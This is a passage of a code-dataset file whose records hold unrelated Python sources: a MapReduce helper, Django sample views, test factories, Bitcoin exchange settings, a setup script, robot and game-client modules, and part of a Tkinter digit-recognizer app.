A ``reducer()`` that ``return``s a single value\n        only has an output key containing a single value, however one that\n        ``yield``s multiple values produces an output key containing multiple\n        values.\n\n        Output from ``reducer()`` can be sorted similar to :meth:`mapper`\n        before being passed to :meth:`output` based on the number of elements,\n        :attr:`sort_reduce_with_value`, and :attr:`sort_reduce_reverse`.\n\n        Parameters\n        ----------\n        key : object\n            The partition key, which is the first element in the output from\n            :meth:`mapper`.\n        values : list\n            List of all values emitted by :meth:`mapper`. May or may not be\n            sorted. See :meth:`mapper` for information about sorting.\n\n        Returns\n        -------\n        A ``tuple`` with 2 or 3 elements. Can also ``yield`` multiple\n        ``tuple``s.\n        \"\"\"\n\n    def output(self, mapping):\n\n        \"\"\"Catch and optionally modify task output before returning to caller.\n\n        Parameters\n        ----------\n        mapping : dict\n            A mapping between the first element produced by each\n            :meth:`reducer` call and its corresponding values. See\n            :meth:`reducer` for an explanation about when the dictionary values\n            can be a ``list``.\n\n        Returns\n        -------\n        Anything! The default implementation just passes on the input ``dict``\n        unaltered.\n        \"\"\"\n\n        return mapping\n\n    @property\n    def sort_map_with_value(self):\n\n        \"\"\"Include value/data when sorting output of the map phase.\n\n        If :meth:`mapper`'s output does not include a sort element then this\n        flag causes the sort phase to sort on the actual value. If\n        :meth:`mapper`'s output does include a sort element then the sort phase\n        sorts on that element and the actual value.\n\n        Returns\n        -------\n        bool\n        \"\"\"\n\n        return False\n\n    @property\n    def sort_map_reverse(self):\n\n        \"\"\"Sort output of map phase like ``sorted(..., reverse=True)``.\n\n        Indicates if the output of :meth:`mapper` should be sorted\n        descending instead of ascending. Ignored if not sorting. See\n        :meth:`mapper` for more information.\n\n        Returns\n        -------\n        bool\n        \"\"\"\n\n        return False\n\n    @property\n    def sort_reduce_with_value(self):\n\n        \"\"\"Include data/value when sorting output of the reduce phase.\n\n        Like :attr:`sort_map_with_value` but for the output of\n        :meth:`reducer`. See :meth:`mapper` and :meth:`reducer` for\n        more information.\n\n        Returns\n        -------\n        bool\n        \"\"\"\n\n        return False\n\n    @property\n    def sort_reduce_reverse(self):\n\n        \"\"\"Sort output of reduce phase like ``sorted(..., reverse=True)``.\n\n        Like :attr:`sort_map_reverse` but for the output of :meth:`reducer`.\n        See :meth:`mapper`, :meth:`reducer`, and :meth:`sort_map_reverse` for\n        more information.\n\n        Returns\n        -------\n        bool\n        \"\"\"\n\n        return False\n\n    def close(self):\n\n        \"\"\"Optionally tear down class.\n\n        This class can be structured as a context manager. By default,\n        :meth:`__exit__` calls this method, so context teardown can be\n        achieved by overloading this method.\n        \"\"\"\n\n    def __enter__(self):\n\n        \"\"\"Enter context.\n\n        Default implementation does nothing.\n        \"\"\"\n\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n\n        \"\"\"Exit context.\n\n        Default implementation calls :meth:`close`.\n        \"\"\"\n\n        self.close()\n\n    def __partition_and_sort(\n            self, sequence, sort_with_value, reverse):\n\n        \"\"\"Partition and sort data after mapping but before reducing.\n\n        Given the output from :meth:`mapper` or :meth:`reducer`, partition,\n        sort if necessary, remove any data that was only used for sorting.\n\n        Parameters\n        ----------\n        sequence : iterable\n            Of ``tuple``s. 
Output from :meth:`mapper` or :meth:`reducer`.\n sort_with_value : bool\n Indicates if data should be sorted based on the value element in\n addition to any sort elements that may be present.\n reverse : bool\n Indicates if data should be sorted descending instead of ascending.\n\n Returns\n -------\n dict\n Where keys are partitions and values are ready to be passed to\n :meth:`reduce` or :meth:`output`. All extra sorting information\n has been removed.\n \"\"\"\n\n sequence = (s for s in sequence)\n first = next(sequence)\n sequence = it.chain([first], sequence)\n\n if len(first) not in (2, 3):\n raise ElementCountError(\n \"Expected data of size 2 or 3, not {}. Example: {}\".format(\n len(first), first))\n\n has_sort_element = len(first) == 3\n need_sort = has_sort_element or sort_with_value\n\n if has_sort_element:\n sequence = map(op.itemgetter(0, slice(1, 3)), sequence)\n\n if not need_sort:\n getval = None\n sortkey = None\n\n elif not has_sort_element and sort_with_value:\n def getval(x):\n return x\n sortkey = None\n\n else:\n getval = op.itemgetter(1)\n if sort_with_value:\n sortkey = None\n else:\n sortkey = op.itemgetter(0)\n\n partitioned = defaultdict(list)\n for ptn, vals in sequence:\n partitioned[ptn].append(vals)\n\n if need_sort:\n partitioned = {\n p: (\n v.sort(key=sortkey, reverse=reverse),\n list(map(getval, v))\n )[1]\n for p, v in partitioned.items()\n }\n\n return partitioned\n\n def __call__(self, sequence, map=None, mapper_map=None, reducer_map=None):\n\n \"\"\"Execute a map reduce task.\n\n Given a sequence of input data, execute the map reduce task in\n several phases:\n\n 1. Map (:meth:`mapper`).\n 2. Partition and optionally sort.\n 3. Reduce (:meth:`reducer()`).\n 4. Partition and optionally sort.\n 5. Construct output (:meth:`output`).\n\n Optionally the map and/or reduce phases can be executed concurrently\n by passing a parallelized ``map()`` function to ``mapper_map`` and\n ``reducer_map``. For example, this ``WordCount`` implementation\n runs each :meth:`mapper` in a separate thread but runs the reducer\n serially:\n\n .. code-block:: python\n\n from concurrent.futures import ThreadPoolExecutor\n\n class WordCount(MapReduce):\n\n def mapper(self, item):\n with open(item) as f:\n for line in f:\n for word in line.split():\n yield word, 1\n\n def reducer(self, key, values):\n return key, sum(values)\n\n with WordCount() as mr, ThreadPoolExecutor(4) as pool:\n\n paths = [\"file1.txt\", \"file2.txt\"]\n\n results = mr(paths, mapper_map=pool.map)\n\n Passing the same function to ``reducer_map`` would cause each\n :meth:`reducer` to be executed in its own thread.\n\n Parameters\n ----------\n sequence : sequence\n Input data. :meth:`mapper` is mapped across this similar to:\n ``map(self.mapper, sequence)``.\n map : callable\n A convenience parameter that sets both ``mapper_map`` and\n ``reducer_map``, although those parameters take precedence.\n mapper_map : callable\n Like above but ``mapper_map(self.mapper, sequence)``. Example\n above illustrates how to run the ``map`` phase across multiple\n threads.\n reducer_map : callable\n Like ``mapper_map`` but for the ``reducer`` phase.\n\n Returns\n -------\n object\n See :meth:`output`.\n \"\"\"\n\n # If 'mapper()' is a generator, and it will be executed in some job\n # pool, wrap it in a function that expands the returned generator\n # so that the pool can serialize results and send back. 
Be sure to\n # wrap properly to preserve any docstring present on the method.\n mapper = self.mapper\n if mapper_map is not None and isgeneratorfunction(self.mapper):\n mapper = partial(_wrap_mapper, mapper=self.mapper)\n\n # Same as 'mapper()' but for 'reducer()'.\n reducer = self.reducer\n if reducer_map is not None:\n reducer = partial(_wrap_reducer, reducer=self.reducer)\n\n # Run map phase. If 'mapper()' is a generator flatten everything to\n # a single sequence.\n mapper_map = mapper_map or builtins.map\n mapped = mapper_map(mapper, sequence)\n if isgeneratorfunction(self.mapper):\n mapped = it.chain.from_iterable(mapped)\n\n # Partition and sort (if necessary).\n partitioned = self.__partition_and_sort(\n mapped,\n sort_with_value=self.sort_map_with_value,\n reverse=self.sort_map_reverse)\n\n # Run reducer. Be sure not to hold on to a pointer to the partitioned\n # dictionary. Instead, replace it with a pointer to a generator.\n reducer_map = reducer_map or it.starmap\n partitioned = partitioned.items()\n reduced = reducer_map(reducer, partitioned)\n\n # If reducer is a generator expand to a single sequence.\n if isgeneratorfunction(self.reducer):\n reduced = it.chain.from_iterable(reduced)\n\n # Partition and sort (if necessary).\n partitioned = self.__partition_and_sort(\n reduced,\n sort_with_value=self.sort_reduce_with_value,\n reverse=self.sort_reduce_reverse)\n\n # The reducer can yield several values, or it can return a single\n # value. When the operating under the latter condition extract that\n # value and pass that on as the single output value.\n if not isgeneratorfunction(self.reducer):\n partitioned = {k: next(iter(v)) for k, v in partitioned.items()}\n\n # Be sure not to pass a 'defaultdict()' as output.\n return self.output(dict(partitioned))\n\n\ndef _wrap_mapper(item, mapper):\n\n \"\"\"Use when running concurrently to normalize mapper output.\n\n Expands generator produced by :meth:`MapReduce.mapper` so that results can\n be serialized and returned by a worker.\n\n Parameters\n ----------\n item : object\n See :meth:`MapReduce.mapper`.\n mapper : callable\n A :meth:`MapReduce.mapper`.\n\n Returns\n -------\n tuple\n \"\"\"\n\n return tuple(mapper(item))\n\n\ndef _wrap_reducer(key_values, reducer):\n\n \"\"\"Like :func:`_wrap_mapper` but for :meth:`MapReduce.reducer`.\n\n Parameters\n ----------\n key_values : tuple\n Arguments for :meth:`MapReduce.reducer`. First element is the key and\n second is values.\n reducer : callable\n A :meth:`MapReduce.reducer`.\n \"\"\"\n\n return tuple(reducer(*key_values))\n\n\nclass ElementCountError(Exception):\n\n \"\"\"Raise when the actual element count does not match expectations.\"\"\"\n","sub_path":"tinymr.py","file_name":"tinymr.py","file_ext":"py","file_size_in_byte":18593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"394726817","text":"from django.http import JsonResponse\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import NucleicAcidType, SampleProtocol, Sample, FileSample\nfrom .forms import SampleForm\n\nimport logging\nimport json\n\nlogger = logging.getLogger('db')\n\n\ndef get_nucleic_acid_types(request):\n \"\"\" Get the list of all nucleic acid types. 
\"\"\"\n data = [\n {\n 'id': nat.id,\n 'name': nat.name,\n 'type': nat.type,\n }\n for nat in NucleicAcidType.objects.all()\n ]\n return JsonResponse(data, safe=False)\n\n\ndef get_sample_protocols(request):\n \"\"\" Get the list of all sample protocols. \"\"\"\n data = []\n\n if request.method == 'GET':\n sample_type = request.GET.get('type', '')\n sample_protocols = SampleProtocol.objects.filter(type=sample_type)\n\n data = [\n {\n 'id': protocol.id,\n 'name': protocol.name,\n 'type': protocol.type,\n 'provider': protocol.provider,\n 'catalog': protocol.catalog,\n 'explanation': protocol.explanation,\n 'inputRequirements': protocol.input_requirements,\n 'typicalApplication': protocol.typical_application,\n 'comments': protocol.comments,\n }\n for protocol in sample_protocols\n ]\n\n return JsonResponse(data, safe=False)\n\n\n@login_required\ndef save_sample(request):\n \"\"\" Add a new sample or update an existing one. \"\"\"\n error = ''\n form = None\n data = []\n\n if request.method == 'POST':\n mode = request.POST.get('mode')\n sample_id = request.POST.get('sample_id', '')\n files = json.loads(request.POST.get('files', '[]'))\n\n if mode == 'add':\n form = SampleForm(request.POST)\n elif mode == 'edit':\n try:\n smpl = Sample.objects.get(pk=sample_id)\n form = SampleForm(request.POST, instance=smpl)\n except (ValueError, Sample.DoesNotExist) as e:\n form = None\n error = str(e)\n logger.exception(e)\n else:\n form = None\n\n if form:\n if form.is_valid():\n smpl = form.save()\n\n if mode == 'add':\n smpl.files.add(*files)\n data = {\n 'name': smpl.name,\n 'recordType': 'S',\n 'sampleId': smpl.id,\n 'barcode': smpl.barcode,\n }\n\n elif mode == 'edit':\n if files:\n old_files = [file for file in smpl.files.all()]\n smpl.files.clear()\n smpl.save()\n smpl.files.add(*files)\n new_files = [file for file in smpl.files.all()]\n\n # Delete files\n files_to_delete = list(set(old_files) - set(new_files))\n for file in files_to_delete:\n file.delete()\n else:\n error = str(form.errors)\n logger.debug(form.errors)\n else:\n error = error if error else 'Wrong or missing mode.'\n else:\n error = 'Wrong HTTP method.'\n\n return JsonResponse({'success': not error, 'error': error, 'data': data})\n\n\n@login_required\ndef delete_sample(request):\n \"\"\" Delete sample with a given id. 
\"\"\"\n error = ''\n\n if request.method == 'POST':\n record_id = request.POST.get('record_id', '')\n try:\n sample = Sample.objects.get(pk=record_id)\n sample.delete()\n except (ValueError, Sample.DoesNotExist) as e:\n error = str(e)\n logger.exception(e)\n else:\n error = 'Wrong HTTP method.'\n\n return JsonResponse({'success': not error, 'error': error})\n\n\n@csrf_exempt\n@login_required\ndef upload_files(request):\n \"\"\" \"\"\"\n error = ''\n file_ids = []\n\n if any(request.FILES):\n for file in request.FILES.getlist('files'):\n f = FileSample(name=file.name, file=file)\n f.save()\n file_ids.append(f.pk)\n\n return JsonResponse({\n 'success': not error,\n 'error': error,\n 'fileIds': file_ids,\n })\n\n\n@login_required\ndef get_files(request):\n \"\"\" \"\"\"\n error = ''\n data = []\n\n file_ids = request.GET.get('file_ids')\n\n if file_ids:\n file_ids = json.loads(file_ids)\n\n files = [f for f in FileSample.objects.all() if f.pk in file_ids]\n data = [\n {\n 'id': file.id,\n 'name': file.name,\n 'size': file.file.size,\n 'path': settings.MEDIA_URL + file.file.name,\n }\n for file in files\n ]\n\n return JsonResponse({'success': not error, 'error': error, 'data': data})\n","sub_path":"sample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"16408797","text":"import factory\nfrom .models import Channel, Entity\n\n\nclass EntityFactory(factory.DjangoModelFactory):\n\n class Meta:\n model = Entity\n django_get_or_create = ('name', )\n\n name = \"EPFL\"\n\n\nclass ChannelFactory(factory.DjangoModelFactory):\n\n class Meta:\n model = Channel\n django_get_or_create = (\n 'name',\n 'fr_description',\n 'en_description',\n 'fr_source',\n 'en_source',\n 'entity',\n )\n\n name = 'idevelop'\n fr_description = 'Un canal avec pleins de news technologiques'\n en_description = 'Channel with lots of technologies news'\n fr_source = 'idevelop'\n en_source = 'idevelop'\n entity = factory.SubFactory(EntityFactory)\n\n @factory.post_generation\n def projects(self, create, extracted, **kwargs):\n if not create:\n # Simple build, do nothing.\n return\n\n if extracted:\n # A list of groups were passed in, use them\n for project in extracted:\n self.projects.add(project)\n","sub_path":"src/channel/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31570053","text":"__author__ = 'Rex'\n\nSOURCE_LOCAL = 'local rpc'\nSOURCE_BLOCKCHAIN_INFO = 'blockchain.info'\nSOURCE_BLOCKEXPLORER_COM = \"blockexplorer.com\"\n\nTEST = True\nTEST_NET = True\nDEFAULT_SOURCE = SOURCE_LOCAL\n\nUSE_FAKE_DATA = False\nIGNORE_SEND_FROM_LOCAL = False\n\nif USE_FAKE_DATA:\n from types import Block, Transaction\n from datetime import datetime, timedelta\n\n now = datetime.now()\n delta = timedelta(seconds=600)\n\n blocks = [\n Block(\n height=1,\n hash='1',\n previous_hash='0',\n transactions=[], # test empty\n timestamp=now,\n ),\n Block(\n height=2,\n hash='2',\n previous_hash='1',\n transactions=[\n #openexchange change state to running\n Transaction(['xch_open_exchange'], [(1, 'xch_state_control', 1)], 'hash1'),\n #create asset ASICMINER\n Transaction(['xch_open_exchange'], [(1, 'xch_create_asset', 1)], 'hash2'),\n #change ASICMINER's running state to running\n Transaction(['xch_open_exchange'], [(1, 'asm_state_control', 1)], 'hash3'),\n ],\n timestamp=now+delta\n ),\n 
Block(\n height=3,\n hash='3',\n previous_hash='2',\n transactions=[\n #captain miao: limit sell 0.1*9999\n Transaction(['captain_miao'], [(1, 'asm_limit_sell', 10009999)], 'hash4'),\n ],\n timestamp=now+delta*2\n ),\n Block(\n height=4,\n hash='4',\n previous_hash='3',\n transactions=[\n #captain miao: limit sell 0.09*99\n Transaction(['captain_miao'], [(1, 'asm_limit_sell', 9000099)], 'hash4'),\n #rex: market buy 1BTC\n Transaction(['rex'], [(1, 'asm_market_buy', 1000000000)], 'hash5'),\n ],\n timestamp=now+delta*3\n )\n ]\n\n FAKE_DATA_GET_BLOCK_COUNT = len(blocks) # exchange start height = 0 when debug\n FAKE_DATA_GET_BLOCK_BY_HASH = {str(i+1):blocks[i] for i in xrange(len(blocks))}\n FAKE_DATA_GET_BLOCK_BY_HEIGHT = {i+1:blocks[i] for i in xrange(len(blocks))}\n","sub_path":"src/pybit/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295299331","text":"'''\nAuthor: 龙嘉伟\nDate: 2021-06-28 19:10:40\nLastEditors: 龙嘉伟\nLastEditTime: 2021-07-01 10:13:24\nDescription: \n'''\n#! -*- coding: utf-8 -*-\nimport os\nimport shutil\nimport sys\n\nfrom pkg_resources import DistributionNotFound, get_distribution\nfrom setuptools import find_packages, setup\n\nstdout = sys.stdout\nstderr = sys.stderr\n\nlog_file = open('setup.log', 'w')\nsys.stdout = log_file\nsys.stderr = log_file\n\nwith open('README.md', 'r', encoding = 'utf8') as fh:\n long_description = fh.read()\n\nsetup(\n name='cutcut',\n version='0.0.1',\n description='General tokenizer',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='MIT',\n url='https://github.com/ljv006/cutcut',\n author='ljv006',\n author_email='longjw6@qq.com',\n # include_package_data = True,\n classifiers = [\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. 
In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n packages=['cutcut'],\n package_dir = {'cutcut':'cutcut'},\n install_requires=['bert-for-tf2','tensorflow>=2.0.0'],\n package_data= {\"cutcut\":[\"*.*\", \"data/*.txt\", 'savedModel/variables/*', 'savedModel/saved_model.pb']},\n python_requires='>=3.6',\n)\nlog_file.close()\n\nsys.stdout = stdout\nsys.stderr = stderr\n\nwith open('setup.log', 'r') as log_file:\n sys.stdout.write(log_file.read())\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141684718","text":"import math\n\nimport wpilib\n\nfrom pyswervedrive.chassis import SwerveChassis\n\n\nclass Hatch:\n\n chassis: SwerveChassis\n\n hatch_bottom_puncher: wpilib.Solenoid\n hatch_left_puncher: wpilib.Solenoid\n hatch_right_puncher: wpilib.Solenoid\n hatch_wedge_piston: wpilib.DoubleSolenoid\n\n left_limit_switch: wpilib.DigitalInput\n right_limit_switch: wpilib.DigitalInput\n\n def setup(self):\n self.has_hatch = False\n\n def on_enable(self):\n self._punch_on = False\n self.hatch_wedge_piston.set(wpilib.DoubleSolenoid.Value.kForward)\n self.clear_to_retract = False\n self.fired_position = 0, 0\n self.loop_counter = 0\n\n def execute(self):\n \"\"\"Run at the end of every control loop iteration.\"\"\"\n delay = -1\n self.hatch_bottom_puncher.set(self._punch_on)\n self.hatch_left_puncher.set(self._punch_on and self.loop_counter > delay)\n self.hatch_right_puncher.set(self._punch_on and self.loop_counter > delay)\n if self._punch_on and self.loop_counter > delay:\n self.has_hatch = False\n self.loop_counter += 1\n if self.is_contained() and self.clear_to_retract:\n self.has_hatch = True\n if self.clear_to_retract:\n self._retract()\n if (\n math.hypot(\n self.fired_position[0] - self.chassis.odometry_x,\n self.fired_position[1] - self.chassis.odometry_y,\n )\n > 0.5\n ):\n self.clear_to_retract = True\n\n def punch(self):\n self.loop_counter = 0\n self._punch_on = True\n self.clear_to_retract = False\n self.fired_position = self.chassis.position\n\n def _retract(self):\n self._punch_on = False\n self.clear_to_retract = False\n\n def is_contained(self):\n return any(\n [not self.left_limit_switch.get(), not self.right_limit_switch.get()]\n )\n","sub_path":"components/hatch.py","file_name":"hatch.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"439114880","text":"import sys\n\n\ndef execute(arr, N):\n Len = []\n for item in arr:\n Set = set(item)\n Len.append(len(Set))\n return len(set(Len))\n\n\nInput = []\nfor line in sys.stdin:\n if line.strip() == '':\n break\n Input.append(line)\n\nN = int(Input[0])\nbegin = 1\narr = []\nfor i in range(0, N):\n s = Input[begin]\n arr.append(s)\n begin += 1\n\nprint(execute(arr, N))\n","sub_path":"Code/CodeRecords/2908/60772/252601.py","file_name":"252601.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127341486","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\fsd\\schemas\\nestedIndexedOffsetData.py\nimport logging\nlog = 
logging.getLogger(__name__)\nimport time\nimport itertools\n\nclass NestedKeyDuplicationError(Exception):\n\n def __init__(self, indexedDuplicateData):\n self.indexedDuplicateData = indexedDuplicateData\n\n def __str__(self):\n message = ''\n for nestedIndexId, duplicateData in self.indexedDuplicateData.iteritems():\n message += 'Duplicate keys found for index %d:\\n' % nestedIndexId\n for key, duplicates in duplicateData.iteritems():\n message += '%s - defined in %s\\n' % (str(key), [ x for x in duplicates ])\n\n return message[:-1]\n\n\nclass IndexedOffsetData(object):\n\n def __init__(self, offset=0):\n self.offset = offset\n self.offsetData = {}\n self.nestedIndexedOffsetDataList = []\n\n def AddOffset(self, additionalOffset):\n self.offset += additionalOffset\n\n def AddKeyOffsetSizeAndPathToNestedIndexId(self, dataKey, offset, size, path, nestedIndexId):\n if nestedIndexId not in self.offsetData:\n self.offsetData[nestedIndexId] = []\n indexedOffsetData = self.offsetData[nestedIndexId]\n indexedOffsetData.append(_GenerateTupleForOffsetData(dataKey, offset, size, path))\n\n def Flatten(self):\n log.info('Starting to flatten')\n startTime = time.time()\n flattenedData = _FlattenOffsetData(self)\n t = time.time()\n for nestedIndexId, flattenedDataset in flattenedData.iteritems():\n flattenedData[nestedIndexId] = sorted(flattenedDataset, key=lambda x: x[0])\n\n log.info('Sorting flattened dict took: %.10f s' % (time.time() - t))\n t = time.time()\n indexedDuplicateData = _GetDuplicateData(flattenedData)\n if len(indexedDuplicateData) > 0:\n raise NestedKeyDuplicationError(indexedDuplicateData)\n log.info('Sorting and checking for duplicates took %.10f' % float(time.time() - t))\n log.info('Flattening, sorting and checking for duplicates took : %f s' % (time.time() - startTime))\n return flattenedData\n\n def AddNestedIndexedOffsetData(self, nestedIndexedOffsetData):\n self.nestedIndexedOffsetDataList.append(nestedIndexedOffsetData)\n\n def isEmpty(self):\n return len(self.offsetData) == 0 and len(self.nestedIndexedOffsetDataList) == 0\n\n\ndef _GenerateTupleForOffsetData(dataKey, offset, size, path):\n return (\n dataKey, offset, size, path)\n\n\ndef _GetKeyFromOffsetData(offsetDataTuple):\n return offsetDataTuple[0]\n\n\ndef _GetPathFromOffsetData(offsetDataTuple):\n return offsetDataTuple[3]\n\n\ndef _AddDataWithAddedOffsetToFlattenedDict(data, additionalOffset, flattenedDataDict):\n for nestedIndexId, offsetData in data.iteritems():\n if nestedIndexId not in flattenedDataDict:\n flattenedDataDict[nestedIndexId] = []\n for key, offset, size, path in offsetData:\n updatedOffsetData = _GenerateTupleForOffsetData(key, offset + additionalOffset, size, path)\n flattenedDataDict[nestedIndexId].append(updatedOffsetData)\n\n\ndef _AddOffsetToNestedIndexedDataList(nestedIndexedOffsetDataList, offset):\n for nestedIndexedOffsetData in nestedIndexedOffsetDataList:\n nestedIndexedOffsetData.AddOffset(offset)\n\n\ndef _FindDuplicateKeysWithPathInList(dataGroupedByKeys):\n duplicateKeysWithPath = {}\n for k, v in dataGroupedByKeys:\n l = list(v)\n if len(l) > 1:\n duplicateKeysWithPath[k] = [ _GetPathFromOffsetData(offsetData) for offsetData in l ]\n\n return duplicateKeysWithPath\n\n\ndef _GetDuplicateData(flattenedData):\n indexedDuplicateData = {}\n for nestedIndexId, indexedFlattenedData in flattenedData.iteritems():\n d = _FindDuplicateKeysWithPathInList(itertools.groupby(indexedFlattenedData, key=lambda x: _GetKeyFromOffsetData(x)))\n if len(d) > 0:\n indexedDuplicateData[nestedIndexId] = 
d\n\n    return indexedDuplicateData\n\n\ndef _FlattenOffsetData(indexedOffsetDataObject):\n    flattenedDict = {}\n    dataStack = [indexedOffsetDataObject]\n    startTime = time.time()\n    while len(dataStack) != 0:\n        data = dataStack.pop()\n        if len(data.offsetData) != 0:\n            _AddDataWithAddedOffsetToFlattenedDict(data.offsetData, data.offset, flattenedDict)\n        if len(data.nestedIndexedOffsetDataList) != 0:\n            _AddOffsetToNestedIndexedDataList(data.nestedIndexedOffsetDataList, data.offset)\n            dataStack.extend(data.nestedIndexedOffsetDataList)\n\n    log.info('Flattening dict took: %f s' % (time.time() - startTime))\n    return flattenedDict","sub_path":"client/fsd/schemas/nestedIndexedOffsetData.py","file_name":"nestedIndexedOffsetData.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"412155660","text":"import tkinter as tk \nfrom tkinter import ttk\nimport win32gui\nfrom PIL import ImageGrab, Image\n\nfrom keras.models import load_model\nfrom keras.models import Model\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\n\nclass Recognizer:\n\tdef __init__(self, master):\n\t\t# set up for window\n\t\tself.window = master\n\t\tself.window.title('Digit recognizer')\n\t\tself.window.geometry('895x400')\n\n\t\t# load model\n\t\tself.model = load_model('mnist.h5')\n\t\t# self.model = 1\n\n\t\t# canvas to draw\n\t\tself.draw_canvas = tk.Canvas(self.window, width=280, height=280, bg='black', cursor='circle')\n\t\tself.old_x = None\n\t\tself.old_y = None\n\n\t\t# canvas to show probabilities\n\t\tself.proba_canvas = tk.Canvas(self.window, width=600, height=280, bg='white')\n\n\t\t# button\n\t\tself.clear_button = tk.Button(self.window, text='Clear', font=('Helvetica', 15), width=8, state='disabled', command=self.clear)\n\t\tself.predict_button = tk.Button(self.window, text='Predict', font=('Helvetica', 15), width=8, state='disabled', command=self.draw_prob)\n\t\tself.visualize_button = tk.Button(self.window, text='Visualize outputs of each layers',font=('Helvetica', 15), width=25, state='disabled', command=self.visualize)\n\n\t\t# label\n\t\tself.predict_label = tk.Label(self.window, text='', font=('Helvetica', 15))\n\n\n\t\t# grid system\n\t\tself.draw_canvas.grid(row=0, column=0, columnspan=2)\n\t\tself.proba_canvas.grid(row=0, column=2, columnspan=10, stick='ew')\n\n\t\tself.clear_button.grid(row=1, column=0, pady=5)\n\t\tself.predict_button.grid(row=1, column=1, pady=5)\n\t\tself.visualize_button.grid(row=2, column=0, columnspan=2, padx=3)\n\n\t\tself.predict_label.grid(row=3, column=2, columnspan=10)\n\n\t\t# bind draw_canvas: draw while dragging with the left button, reset on release\n\t\tself.draw_canvas.bind('<B1-Motion>', self.draw_digit)\n\t\tself.draw_canvas.bind('<ButtonRelease-1>', self.reset_xy)\n\n\t\t# label for digits\n\t\tself.create_digit_label()\n\n\tdef create_digit_label(self):\n\t\td0_label = tk.Label(self.window, text='0', font=('Helvetica', 15))\n\t\td1_label = tk.Label(self.window, text='1', font=('Helvetica', 15))\n\t\td2_label = tk.Label(self.window, text='2', font=('Helvetica', 15))\n\t\td3_label = tk.Label(self.window, text='3', font=('Helvetica', 15))\n\t\td4_label = tk.Label(self.window, text='4', font=('Helvetica', 15))\n\t\td5_label = tk.Label(self.window, text='5', font=('Helvetica', 15))\n\t\td6_label = tk.Label(self.window, text='6', font=('Helvetica', 15))\n\t\td7_label = tk.Label(self.window, text='7', font=('Helvetica', 15))\n\t\td8_label = tk.Label(self.window, 
text='8', font=('Helvetica', 15))\n\t\td9_label = tk.Label(self.window, text='9', font=('Helvetica', 15))\n\n\t\tdiagram_label = tk.Label(self.window, text='Probability histogram', font=('Helvetica', 15))\n\n\t\td0_label.grid(row=1, column=2)\n\t\td1_label.grid(row=1, column=3)\n\t\td2_label.grid(row=1, column=4)\n\t\td3_label.grid(row=1, column=5)\n\t\td4_label.grid(row=1, column=6)\n\t\td5_label.grid(row=1, column=7)\n\t\td6_label.grid(row=1, column=8)\n\t\td7_label.grid(row=1, column=9)\n\t\td8_label.grid(row=1, column=10)\n\t\td9_label.grid(row=1, column=11)\n\n\t\tdiagram_label.grid(row=2, column=2, columnspan=10)\n\n\tdef draw_digit(self, event):\n\t\tif(self.old_x and self.old_y):\n\t\t\tself.draw_canvas.create_line(self.old_x, self.old_y, event.x, event.y, fill='white', width=15, capstyle='round', smooth=True)\n\n\t\tself.old_x = event.x \n\t\tself.old_y = event.y\n\n\t\tif(self.old_x != None and self.old_y != None):\n\t\t\tself.predict_button.configure(state='normal')\n\t\t\tself.clear_button.configure(state='normal')\n\n\tdef reset_xy(self, event):\n\t\tself.old_x = None\n\t\tself.old_y = None\n\n\tdef clear(self):\n\t\tself.draw_canvas.delete('all')\n\t\tself.proba_canvas.delete('all')\n\n\t\tself.predict_label.configure(text='')\n\n\t\tself.predict_button.configure(state='disabled')\n\t\tself.clear_button.configure(state='disabled')\n\t\tself.visualize_button.configure(state='disabled')\n\n\tdef get_image(self):\n\t\tHWND = self.draw_canvas.winfo_id()\n\t\trect = win32gui.GetWindowRect(HWND)\n\t\timg = ImageGrab.grab(rect)\n\n\t\timg = img.resize((28, 28))\n\t\timg = img.convert('L') # convert to grayscale\n\t\timg = np.array(img)\n\t\timg = img.reshape((1, 28, 28, 1))\n\t\timg = img / 255.\n\n\t\treturn img \n\n\tdef predict(self, img):\n\t\tprob = self.model.predict([img])[0]\n\t\tdigit = np.argmax(prob)\n\n\t\treturn prob, digit \n\n\n\tdef draw_prob(self):\n\t\timg = self.get_image()\n\t\tprob, digit = self.predict(img)\n\n\t\tself.predict_label.configure(text=\"Predict: \" + str(digit))\n\n\t\t# look up prob_canvas_coordinates.png to know how to caculate coordinates\n\n\t\t# for digit 0\n\t\tx1, y1 = 45, 280\n\t\tx2, y2 = x1 - 30, 280 - (280 * prob[0])\n\t\tif(digit == 0):\n\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, 